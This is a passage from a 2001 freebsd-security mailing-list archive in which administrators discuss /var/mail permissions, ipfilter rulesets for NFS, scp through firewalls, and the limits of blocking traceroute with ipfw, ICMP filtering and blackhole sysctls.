use separate locking program (such as mutt-dotlock) or even get rid of /var/mail as ugly legacy. Keep all incoming mail in user's home and "your teeth will be white anf fluffy". > 1777 gives you the additional benefit of protecting you from compromises on > the mail group, but requires that on every machine quotas be installed even > for machines with just one or two users. Without quotas, a malicious user > could fill up /var/mail creating a DoS for everybody receiving mail off > that machine. 775 doesn't protect against compromises of the mail group, > but has the added benefit that it protects against a user filling /var/mail > inadvertently as they would have to purposely send lots of e-mail. Requirement to have /var/mail as separate partition is too hard for most applications. /netch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 4:41:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 5588937B407 for ; Tue, 26 Jun 2001 04:41:17 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id OPU35832; Tue, 26 Jun 2001 14:41:04 +0300 (EEST) (envelope-from netch) Date: Tue, 26 Jun 2001 14:41:04 +0300 From: Valentin Nechayev To: Michael Richards Cc: freebsd-security@FreeBSD.ORG Subject: Re: Letting scp through a firewall using ipfilter Message-ID: <20010626144104.C33308@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3B338EFB.000039.73802@frodo.searchcanada.ca> X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Fri, Jun 22, 2001 at 14:31:23, michael wrote about "Letting scp through a firewall using ipfilter": > I'm trying to get my firewall to allow scp through. It currently > allows ssh in, but it appears that scp creates an outgoing connection > from the remote machine back to the originating machine. Anyone know > how to solve this problem? scp does not create such connection. You mixed it with ftp in active mode. /netch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 5: 3:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 43C8237B405 for ; Tue, 26 Jun 2001 05:03:38 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id PAO38332; Tue, 26 Jun 2001 15:01:27 +0300 (EEST) (envelope-from netch) Date: Tue, 26 Jun 2001 15:01:26 +0300 From: Valentin Nechayev To: "Antoine Beaupre (LMC)" Cc: Igor Roshchin , freebsd-security@FreeBSD.ORG Subject: Re: Read-only /etc/defaults/* (was: Re: /etc/defaults/rc.conf (Was: IPFW newbie)) Message-ID: <20010626150126.D33308@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3B2F9648.3030007@lmc.ericsson.se> X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Tue, Jun 19, 2001 at 14:13:28, Antoine.Beaupre wrote about "Read-only /etc/defaults/* (was: Re: /etc/defaults/rc.conf (Was: IPFW newbie))": > I think we should consider the possibility of having /etc/defaults/* > files read-only to "encourage" this behavior. `install -f uchg' ? /netch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 10: 8: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 3C7F337B401 for ; Tue, 26 Jun 2001 10:07:50 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.30 #1) id 15EwJT-0000Dg-00; Tue, 26 Jun 2001 19:07:43 +0200 From: Sheldon Hearn To: netch@lucky.net Cc: Leonard Chung , security@FreeBSD.ORG Subject: Re: "Correct" permissions on /var/mail? In-reply-to: Your message of "Tue, 26 Jun 2001 14:28:53 +0300." <20010626142853.B33308@lucky.net> Date: Tue, 26 Jun 2001 19:07:43 +0200 Message-ID: <847.993575263@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Presumably you missed the early post that explained that this is a common thread on several mailing lists and needn't be rehashed on this on. Please do us all a favour and follow the URL that was posted if you really think this is interesting. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 10:56:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 247CB37B401 for ; Tue, 26 Jun 2001 10:56:16 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id UVP69925; Tue, 26 Jun 2001 20:56:06 +0300 (EEST) (envelope-from netch) Date: Tue, 26 Jun 2001 20:56:06 +0300 From: Valentin Nechayev To: Sheldon Hearn Cc: security@freebsd.org Subject: Re: "Correct" permissions on /var/mail? Message-ID: <20010626205606.K20517@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <847.993575263@axl.seasidesoftware.co.za> X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Presumably you missed the early post that explained that this is a No, I didn't missed it, along with bugtraq thread. But this pseudo-URL directs to nowhere. If you really want to really lead people to read that bugtraq thread, I ask you to post correct URL without any non-working "switch to thread index and scroll down until moon transforms to a piece of green cheese". > common thread on several mailing lists and needn't be rehashed on this > on. If you insist that bugtraq is The Only Right Place to discuss some questions, I can only shrug. Bugtraq does not have FreeBSD specifics. If one have new & interesting thoughts (and I don't suppose that 100% of humans' brain are gathered in bugtraq), he (she) can say it here. security@ is more correct FreeBSD maillist for it than most of others. I don't ever pretend to expose new & interesting thoughts, but I think there is chance to appearing of such posting, both interesting and with reflecting of local specific. Your policy shout wipes it out for cemetery's sake. > Please do us all a favour and follow the URL that was posted if you > really think this is interesting. I don't think it is "interesting". It's not "interesting" for me. It's _pity_ and shows whole Unix ugliness. But "we're to live _here_". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 11:22:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from nomad.tor.lets.net (H74.C220.tor.velocet.net [216.138.220.74]) by hub.freebsd.org (Postfix) with SMTP id 6046E37B41E for ; Tue, 26 Jun 2001 11:22:16 -0700 (PDT) (envelope-from steve@nomad.lets.net) Received: (qmail 7819 invoked by uid 1001); 26 Jun 2001 18:17:21 -0000 Date: Tue, 26 Jun 2001 14:17:21 -0400 From: Steve Shorter To: freebsd-security@freebsd.org Subject: IPFilter - this should work but doesnt? Message-ID: <20010626141721.B7785@nomad.lets.net> References: <847.993575263@axl.seasidesoftware.co.za> <20010626205606.K20517@lucky.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010626205606.K20517@lucky.net>; from netch@lucky.net on Tue, Jun 26, 2001 at 08:56:06PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Howdy! I have some diskless frontend servers behind a Cisco Firewall and am using ipfilter on the servers to solve some local access/security issues. OS - FreeBSD 4.3 IPFilter - 3.4.16, default pass all, Here are two ipf.rules segments from otherwise identical files. When the first segment is included everthing works good, while if the secound is substituted it hangs on loading (though somethimes it does work, but usually not), probably because NFS is fubar'd # ipf -v -Fa -f /etc/ipf.rules remove flags IO (12) removed 0 filter rules [block in log level local0.warn quick all with ipopts] [snip] [block out log level local0.warn quick on fxp1 all head 112] block out log level local0.warn quick on fxp1(!) from any to any head 112 [block in log level local0.warn quick on fxp2 all head 121] block in log level local0.warn quick on fxp2(!) from any to any head 121 [block out log level local0.warn quick on fxp2 all] block out log level local0.warn quick on fxp2(!) from any to any [pass in quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8 ] pass in quick on lo0(!) from 127.0.0.0/8 to 127.0.0.0/8 [pass out quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8] pass out quick on lo0(!) from 127.0.0.0/8 to 127.0.0.0/8 [pass in quick proto udp from 192.168.10.4/32 port = nfsd to 192.168.10.7/32 port < 1024 keep state keep frags group 101] hangs at this point ... Is the fxp1(!) and similar important? What does it mean? The secound should work (I think) and I prefer it structurally. Ideas? thanx -steve # This works good block in all block out all block in log level local0.warn quick all with ipopts block in log level local0.warn quick all with short block in log level local0.warn quick proto icmp from any to any block out log level local0.warn quick proto icmp from any to any # If I put the next 2 lines in group 101 and 102 doesn't work pass in quick proto udp from 192.168.10.4/32 port = nfsd to 192.168.10.7/32 port < 1024 keep state keep frags pass out quick proto udp from 192.168.10.7/32 port < 1024 to 192.168.10.4/32 port = nfsd keep state keep frags block in log level local0.warn quick on fxp0 all head 101 block out log level local0.warn quick on fxp0 all head 102 block in log level local0.warn quick on fxp1 all head 111 block out log level local0.warn quick on fxp1 all head 112 block in log level local0.warn quick on fxp2 all head 121 block out log level local0.warn quick on fxp2 all pass in quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8 pass out quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8 # group 101 - fxp0 - IN # pass in quick proto udp from 192.168.10.1/32 to 192.168.10.7/32 port = snmp keep state group 101 pass in quick proto tcp from 192.168.10.1/32 to 192.168.10.7/32 port = ssh flags S/SA keep state group 101 # group 102 - fxp0 - OUT # pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = domain keep state group 102 pass out quick proto udp from 192.168.10.7/32 port = syslog to 192.168.10.1/32 port = syslog keep state group 102 pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = ntp keep state group 102 pass out quick proto tcp from 192.168.10.7/32 to 192.168.10.1/32 port = qmqp keep state group 102 # group 111 - fxp1 # pass in quick proto udp from 192.168.30.4/32 port = nfsd to 192.168.30.7/32 port < 1024 keep state keep frags group 111 [ etc ... etc .. nothing interesting... snip] # This doesnt Work block in all block out all block in log level local0.warn quick all with ipopts block in log level local0.warn quick all with short block in log level local0.warn quick proto icmp from any to any block out log level local0.warn quick proto icmp from any to any block in log level local0.warn quick on fxp0 all head 101 block out log level local0.warn quick on fxp0 all head 102 block in log level local0.warn quick on fxp1 all head 111 block out log level local0.warn quick on fxp1 all head 112 block in log level local0.warn quick on fxp2 all head 121 block out log level local0.warn quick on fxp2 all pass in quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8 pass out quick on lo0 from 127.0.0.0/8 to 127.0.0.0/8 # group 101 - fxp0 - IN # # having the next line in this ruleset seems structurally better and # should work but doesn't, Works good if inserted earlier pass in quick proto udp from 192.168.10.4/32 port = nfsd to 192.168.10.7/32 port < 1024 keep state keep frags group 101 pass in quick proto udp from 192.168.10.1/32 to 192.168.10.7/32 port = snmp keep state group 101 pass in quick proto tcp from 192.168.10.1/32 to 192.168.10.7/32 port = ssh flags S/SA keep state group 101 # group 102 - fxp0 - OUT # # having the next line in this ruleset seems structurally better and # should work but doesn't, Works good if inserted earlier pass out quick proto udp from 192.168.10.7/32 port < 1024 to 192.168.10.4/32 port = nfsd keep state keep frags group 102 pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = domain keep state group 102 pass out quick proto udp from 192.168.10.7/32 port = syslog to 192.168.10.1/32 port = syslog keep state group 102 pass out quick proto udp from 192.168.10.7/32 to 192.168.10.1/32 port = ntp keep state group 102 pass out quick proto tcp from 192.168.10.7/32 to 192.168.10.1/32 port = qmqp keep state group 102 # group 111 - fxp1 # pass in quick proto udp from 192.168.30.4/32 port = nfsd to 192.168.30.7/32 port < 1024 keep state keep frags group 111 # group 112 - fxp1 # pass out quick proto udp from 192.168.30.7/32 port < 1024 to 192.168.30.4/32 port = nfsd keep state keep frags group 112 pass out quick proto tcp from 192.168.60.7/32 port > 1023 to 192.168.60.0/24 port = http keep state group 112 pass out quick proto udp from 192.168.30.7/32 to 192.168.30.5/32 port = domain keep state group 121 # group 121 - fxp2 [ etc .. etc.. nothing interesting snip] Thanks for insight - steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 12:23: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id BBC3737B401 for ; Tue, 26 Jun 2001 12:23:00 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.30 #1) id 15EyQS-0000mF-00; Tue, 26 Jun 2001 21:23:04 +0200 From: Sheldon Hearn To: netch@lucky.net Cc: security@freebsd.org Subject: Re: "Correct" permissions on /var/mail? In-reply-to: Your message of "Tue, 26 Jun 2001 20:56:06 +0300." <20010626205606.K20517@lucky.net> Date: Tue, 26 Jun 2001 21:23:04 +0200 Message-ID: <2990.993583384@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 26 Jun 2001 20:56:06 +0300, Valentin Nechayev wrote: > If you insist that bugtraq is The Only Right Place to discuss some > questions, I can only shrug. No. Someone else posted the Bugtraq reference. The point isn't where it was discussed. The point is that this has been discussed many times before on many mailing lists and nothing new has been said on the subject for a while. > I don't think it is "interesting". It's not "interesting" for me. > It's _pity_ and shows whole Unix ugliness. But "we're to live _here_". Now look at it from the perspective of folks who've watched this topic over and over again and think about whether it's really too much to ask for folks to whom this is new to go and do a little reading in mailing list archives. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 12:30:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 5213737B405 for ; Tue, 26 Jun 2001 12:30:43 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 76132 invoked from network); 26 Jun 2001 19:31:06 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 26 Jun 2001 19:31:06 -0000 Message-ID: <002701c0fe76$7530eab0$01000001@book> From: "alexus" To: "Peter Pentchev" Cc: "Simon Rakovec" , References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> Subject: Re: disable traceroute to my host Date: Tue, 26 Jun 2001 15:30:28 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org someone else using ttl=1? that's sux.. oh well i guess its imposible to disable it.. cuz i dont want to block something that should work.. thanks everyone ----- Original Message ----- From: "Peter Pentchev" To: "alexus" Cc: "Simon Rakovec" ; Sent: Tuesday, June 26, 2001 1:58 AM Subject: Re: disable traceroute to my host > On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote: > > i agree this is not a solution.. looks like tty=1 is best solution so far > > TTL=1 is not a general solution, because it only blocks traceroutes to this > particular host, not to any machines that it is acting as a gateway for. > > Moreover, TTL=1 is not a real-world solution, because some *legitimate* > packets might arrive with TTL=1 (yes, there are some OS's that set too > low TTL's on outgoing packets, and there are some global backbone ISP's > which have a *lot* of routers, so it is possible that a normal packet > destined for your host should reach you with TTL=1). > > And just btw.. Really, why do you want to block traceroutes? > > G'luck, > Peter > > -- > because I didn't think of a good beginning of it. > > > ----- Original Message ----- > > From: "Peter Pentchev" > > To: "Simon Rakovec" > > Cc: > > Sent: Monday, June 25, 2001 2:37 AM > > Subject: Re: disable traceroute to my host > > > > > > > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > > > > Try this: > > > > > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > > > > > As Karsten noted in a followup, this is not proper network practice. > > > There might be a LOT of things listening on those UDP ports, including > > > ephemeral outgoing UDP connections. > > > > > > As many other people noted, this does not stop Windows traceroute, > > > which goes via ICMP. > > > > > > As the traceroute(8) manpage notes, this does not stop people who > > > know how to use the traceroute '-p port' option to select a starting > > > port != 32768. > > > > > > As Dag-Erling Smoerdgrav noted, in general it is impossible to disable > > > a person determined to traceroute you, and in practice, there is > > > no need to. > > > > > > G'luck, > > > Peter > > > > > > PS. How was that now... one source: plagiarism, two sources: comparative > > > study, three sources: an academic thesis.. I did even better than that! > > ;) > > > > > > -- > > > Thit sentence is not self-referential because "thit" is not a word. > > > > > > > alexus wrote: > > > > > > > > > > is it possible to disable using ipfw so people won't be able to > > traceroute > > > > > me? > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 14:16: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id DA72D37B401 for ; Tue, 26 Jun 2001 14:15:54 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id HAA02797; Wed, 27 Jun 2001 07:15:07 +1000 (EST) Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37641) with ESMTP id <01K594BRFDJ4VFAJ4X@cim.alcatel.com.au>; Wed, 27 Jun 2001 07:14:53 +1000 Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.1/8.11.1) id f5QLF5v92583; Wed, 27 Jun 2001 07:15:05 +1000 (EST envelope-from jeremyp) Content-return: prohibited Date: Wed, 27 Jun 2001 07:15:04 +1000 From: Peter Jeremy Subject: Re: disable traceroute to my host In-reply-to: <3181060651.20010626150813@SECURITY.NNOV.RU>; from 3APA3A@SECURITY.NNOV.RU on Tue, Jun 26, 2001 at 03:08:13PM +0400 To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Cc: alexus , freebsd-security@FreeBSD.ORG Mail-Followup-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>, alexus , freebsd-security@FreeBSD.ORG Message-id: <20010627071504.P95583@gsmx07.alcatel.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.5i References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: >deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out > >0 - to stop windows traceroute and ping >3 - to stop BSD-style traceroute >11 - to prevent intermediate router to reply traceroute Blocking ICMP type 3 will break Path-MTU discovery (which relies on type 3 code 4). Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 16: 2:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id 59A7C37B409 for ; Tue, 26 Jun 2001 16:02:13 -0700 (PDT) (envelope-from mail@max-info.net) Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5QN1fQ01294; Tue, 26 Jun 2001 19:01:41 -0400 (EDT) (envelope-from mail@max-info.net) Message-ID: <003401c0fe93$a3f405e0$3200a8c0@Home> From: "Ryan Masse" To: "alexus" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> Subject: Re: disable traceroute to my host Date: Tue, 26 Jun 2001 18:59:20 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org did u get my post about blackhole? man blackhole In the UDP instance, enabling blackhole behaviour turns off the sending of an ICMP port unreachable message in response to a UDP datagram which arrives on a port where there is no socket listening. It must be noted that this behaviour will prevent remote systems from running traceroute(8) to your system. The following would enable the use of backhole of your system; sysctl -w net.inet.tcp.blackhole=2 sysctl -w net.inet.udp.blackhole=1 The above would block *nix traceroutes using the udp method. Simply use ipfw icmptype to block all MS attempts Ryan > someone else using ttl=1? that's sux.. oh well i guess its imposible to > disable it.. cuz i dont want to block something that should work.. > > thanks everyone > > ----- Original Message ----- > From: "Peter Pentchev" > To: "alexus" > Cc: "Simon Rakovec" ; > Sent: Tuesday, June 26, 2001 1:58 AM > Subject: Re: disable traceroute to my host > > > > On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote: > > > i agree this is not a solution.. looks like tty=1 is best solution so > far > > > > TTL=1 is not a general solution, because it only blocks traceroutes to > this > > particular host, not to any machines that it is acting as a gateway for. > > > > Moreover, TTL=1 is not a real-world solution, because some *legitimate* > > packets might arrive with TTL=1 (yes, there are some OS's that set too > > low TTL's on outgoing packets, and there are some global backbone ISP's > > which have a *lot* of routers, so it is possible that a normal packet > > destined for your host should reach you with TTL=1). > > > > And just btw.. Really, why do you want to block traceroutes? > > > > G'luck, > > Peter > > > > -- > > because I didn't think of a good beginning of it. > > > > > ----- Original Message ----- > > > From: "Peter Pentchev" > > > To: "Simon Rakovec" > > > Cc: > > > Sent: Monday, June 25, 2001 2:37 AM > > > Subject: Re: disable traceroute to my host > > > > > > > > > > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > > > > > Try this: > > > > > > > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > > > > > > > As Karsten noted in a followup, this is not proper network practice. > > > > There might be a LOT of things listening on those UDP ports, including > > > > ephemeral outgoing UDP connections. > > > > > > > > As many other people noted, this does not stop Windows traceroute, > > > > which goes via ICMP. > > > > > > > > As the traceroute(8) manpage notes, this does not stop people who > > > > know how to use the traceroute '-p port' option to select a starting > > > > port != 32768. > > > > > > > > As Dag-Erling Smoerdgrav noted, in general it is impossible to disable > > > > a person determined to traceroute you, and in practice, there is > > > > no need to. > > > > > > > > G'luck, > > > > Peter > > > > > > > > PS. How was that now... one source: plagiarism, two sources: > comparative > > > > study, three sources: an academic thesis.. I did even better than > that! > > > ;) > > > > > > > > -- > > > > Thit sentence is not self-referential because "thit" is not a word. > > > > > > > > > alexus wrote: > > > > > > > > > > > > is it possible to disable using ipfw so people won't be able to > > > traceroute > > > > > > me? > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 0:55:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id AD59E37B405 for ; Wed, 27 Jun 2001 00:55:04 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.5) with ESMTP id LAA25626; Wed, 27 Jun 2001 11:43:25 +0400 (MSD) Date: Wed, 27 Jun 2001 11:43:24 +0400 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.51) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: http://www.security.nnov.ru X-Priority: 3 (Normal) Message-ID: <79255173079.20010627114324@SECURITY.NNOV.RU> To: Peter Jeremy Cc: alexus , freebsd-security@FreeBSD.ORG Subject: Re[2]: disable traceroute to my host In-Reply-To: <20010627071504.P95583@gsmx07.alcatel.com.au> References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU> <20010627071504.P95583@gsmx07.alcatel.com.au> MIME-Version: 1.0 Content-Type: text/plain; charset=Windows-1251 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Peter, --Wednesday, June 27, 2001, 1:15:04 AM, you wrote to 3APA3A@SECURITY.NNOV.RU: PJ> On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: >>deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out >> >>0 - to stop windows traceroute and ping >>3 - to stop BSD-style traceroute >>11 - to prevent intermediate router to reply traceroute PJ> Blocking ICMP type 3 will break Path-MTU discovery (which relies on PJ> type 3 code 4). It's possible to combine - deny incoming UDP and outgoing ICMP types 0, 11. In any case - there are thousand ways to discover route. Use NAT to hide internal network. PJ> Peter PJ> To Unsubscribe: send mail to majordomo@FreeBSD.org PJ> with "unsubscribe freebsd-security" in the body of the message -- ~/3APA3A Âñåãäà áóäåì ðàäû ïîñëóøàòü âàøå ÷èðèêàíüå (Òâåí) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 8:15:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns2.sysadmin-inc.com (ns2.sysadmin-inc.com [209.16.228.145]) by hub.freebsd.org (Postfix) with SMTP id F343E37B405 for ; Wed, 27 Jun 2001 08:15:11 -0700 (PDT) (envelope-from peter@sysadmin-inc.com) Received: (qmail 75992 invoked by alias); 27 Jun 2001 15:15:11 -0000 Received: from unknown (HELO 98wkst) (10.10.1.70) by ns2.sysadmin-inc.com with SMTP; 27 Jun 2001 15:15:11 -0000 From: "Peter Brezny" To: "Peter Jeremy" Cc: Subject: RE: disable traceroute to my host Date: Wed, 27 Jun 2001 11:14:26 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010627071504.P95583@gsmx07.alcatel.com.au> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peter, What is a good document to get more info on ICMP types? Thanks. Peter Brezny SysAdmin Services Inc. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter Jeremy Sent: Tuesday, June 26, 2001 5:15 PM To: 3APA3A Cc: alexus; freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: >deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out > >0 - to stop windows traceroute and ping >3 - to stop BSD-style traceroute >11 - to prevent intermediate router to reply traceroute Blocking ICMP type 3 will break Path-MTU discovery (which relies on type 3 code 4). Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 8:20:44 